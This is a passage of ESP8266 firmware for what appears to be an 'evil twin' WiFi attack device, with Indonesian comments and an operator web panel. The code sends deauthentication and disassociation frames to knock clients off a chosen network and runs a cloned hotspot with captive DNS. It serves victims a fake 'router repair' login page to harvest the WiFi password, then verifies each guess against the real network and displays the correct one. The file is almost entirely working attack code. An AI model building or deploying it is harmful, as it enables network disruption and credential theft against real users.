    if(bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6))
      _html += "<button style='background:#20c20e;color:#000'>Selected</button>";
    else
      _html += "<button>Select</button>";
    _html += "</form></td></tr>";
  }
  _html += "</table><br>";

  if(_correct != "") _html += "<h1>R3sult</h1><h3>" + _correct + "</h3>";

  _html += "<script>setInterval(async function(){try{let s=await (await fetch('/api/status')).json();"
           "document.getElementById('mon').textContent='up '+s.up+'s | heap '+s.heap+' | target '"
           "+s.target+' | deauth '+s.deauth+' | twin '+s.twin+' | pkt '+s.pkt+' | btn '+s.btn+' ('+s.btnRaw+')"
           "+' | pass '+(s.pass||'-');}catch(e){}},2000);</script>";
  _html += "</div></body></html>";
  return _html;
}

// halaman login yang dilihat korban (demo lab)
String loginPage(){
  String a = _selectedNetwork.ssid;
  return String("<!DOCTYPE html><html><head><title>") + a + " :: Login</title>"
    "<meta name=viewport content='width=device-width,initial-scale=1'>"
    "<style>body{color:#333;font-family:Century Gothic,sans-serif;font-size:18px;margin:0}"
    "nav{background:#dc214c;color:#fff;padding:1em;font-size:1.3em}"
    "input{width:100%;padding:9px 10px;margin:8px 0;border:1px solid #1e31b5}"
    "div{padding:.8em}</style></head><body><nav><b>" + a + "</b></nav>"
    "<div><h1>Login</h1><p>Masukkan kata sandi WiFi untuk melanjutkan perbaikan sistem.</p>"
    "<form action='/'><b>Password:</b><input type=password name=password>"
    "<input type=submit value='Login'></form></div></body></html>";
}

// ---------------- route -----------------------------------------------------
void handleStatus(){
  String s = "{\"up\":" + String(millis()/1000) +
             ",\"heap\":" + String(ESP.getFreeHeap()) +
             ",\"target\":\"" + _selectedNetwork.ssid + "\"" +
             ",\"deauth\":" + String(deauthing_active ? "\"ON\"" : "\"off\"") +
             ",\"twin\":" + String(hotspot_active ? "\"ON\"" : "\"off\"") +
             ",\"pkt\":" + String(sentFrames) +
             ",\"btn\":\"" + String(btnLast) + "\"" +
             ",\"btnRaw\":" + String(btnRaw) +
             ",\"pass\":\"" + _tryPassword + "\"}";
  webServer.send(200, "application/json", s);
}

void handleResult(){
  if(WiFi.status() != WL_CONNECTED){
    oledStatus("pass salah");
    webServer.send(200, "text/html",
      "<html><head><script>setTimeout(function(){window.location.href='/';},3000);</script>"
      "<meta name='viewport' content='initial-scale=1.0, width=device-width'>"
      "<body><h2>You entered wrong password</h2><p>Try again...</p></body></html>");
    return;
  }
  _correct = "Password for " + _selectedNetwork.ssid + "<br>Result: " + _tryPassword;
  oledStatus("pass BENAR");
  deauthing_active = false;
  stopHotspot();
  webServer.send(200, "text/html",
    "<html><head><meta name='viewport' content='initial-scale=1.0, width=device-width'>"
    "<body><h2>System repair has been completed!</h2></body></html>");
}

void handleIndex(){
  if(webServer.hasArg("ap")){
    for(int i = 0; i < 16; i++){
      if(bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap")){
        _selectedNetwork = _networks[i];
        oledStatus("target: " + _selectedNetwork.ssid);
      }
    }
  }

  if(webServer.hasArg("deauth")){
    if(webServer.arg("deauth") == "start"){ deauthing_active = true;  oledStatus("deauth ON"); }
    else                                 { deauthing_active = false; oledStatus("deauth off"); }
    webServer.send(200, "text/html", panelHtml());
    return;
  }

  if(webServer.hasArg("hotspot")){
    if(webServer.arg("hotspot") == "start") startHotspot();
    else                                    stopHotspot();
    webServer.send(200, "text/html", panelHtml());
    return;
  }

  if(webServer.hasArg("stop")){
    stopAll();
    webServer.send(200, "text/html", panelHtml());
    return;
  }

  if(hotspot_active && webServer.hasArg("password")){
    _tryPassword = webServer.arg("password");
    WiFi.disconnect();
    WiFi.begin(_selectedNetwork.ssid.c_str(), _tryPassword.c_str(),
               _selectedNetwork.ch, _selectedNetwork.bssid);
    oledStatus("coba pass...");
    webServer.send(200, "text/html",
      "<html><head><meta name='viewport' content='initial-scale=1.0, width=device-width'>"
      "<script>setTimeout(function(){window.location.href='/result';},15000);</script>"
      "<body><h2>Repairing router system...</h2><p>Please wait...</p></body></html>");
    return;
  }

  if(hotspot_active){
    webServer.send(200, "text/html", loginPage());
    return;
  }

  webServer.send(200, "text/html", panelHtml());
}

// ---------------- setup / loop ---------------------------------------------
void setup(){
  Serial.begin(115200);

  if(!display.begin(SSD1306_SWITCHCAPVCC, 0x3C)){
    Serial.println(F("SSD1306 allocation failed"));
    for(;;);
  }
  display.clearDisplay();
  display.drawBitmap(0, 0, zeroTwinBoot, 128, 64, WHITE);
  display.display();

  WiFi.mode(WIFI_AP_STA);
  wifi_promiscuous_enable(1);
  WiFi.softAPConfig(IPAddress(192,168,4,1), IPAddress(192,168,4,1), IPAddress(255,255,255,0));
  WiFi.softAP(AP_SSID, AP_PASS);
  dnsServer.start(53, "*", IPAddress(192,168,4,1));

  webServer.on("/",           handleIndex);
  webServer.on("/result",     handleResult);
  webServer.on("/api/status", handleStatus);
  webServer.onNotFound(handleIndex);      // URL deteksi HP -> panel: captive auto-buka
  webServer.begin();

  performScan();
  oledStatus("siap");
  Serial.printf("[ZT] AP %s http://192.168.4.1\n", AP_SSID);
}

void loop(){
  dnsServer.processNextRequest();
  webServer.handleClient();
  handleButtons();

  if(deauthing_active && _selectedNetwork.ssid.length() && millis() - deauth_now >= 1000){
    wifi_set_channel(_selectedNetwork.ch);
    uint8_t deauthPacket[26] = {0xC0,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,
                                0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,
                                0x00,0x00,0x01,0x00};
    memcpy(&deauthPacket[10], _selectedNetwork.bssid, 6);
    memcpy(&deauthPacket[16], _selectedNetwork.bssid, 6);
    deauthPacket[24] = 1;

    deauthPacket[0] = 0xC0;                       // deauth
    wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), 0);
    deauthPacket[0] = 0xA0;                       // disassoc
    wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), 0);
    sentFrames += 2;
    deauth_now = millis();
  }

  if(millis() - now >= 15000){ performScan(); now = millis(); }

  if(millis() - oled_now >= 1000){ oledStatus(""); oled_now = millis(); }

  if(millis() - wifinow >= 5000){ wifinow = millis(); }
  delay(2);
}
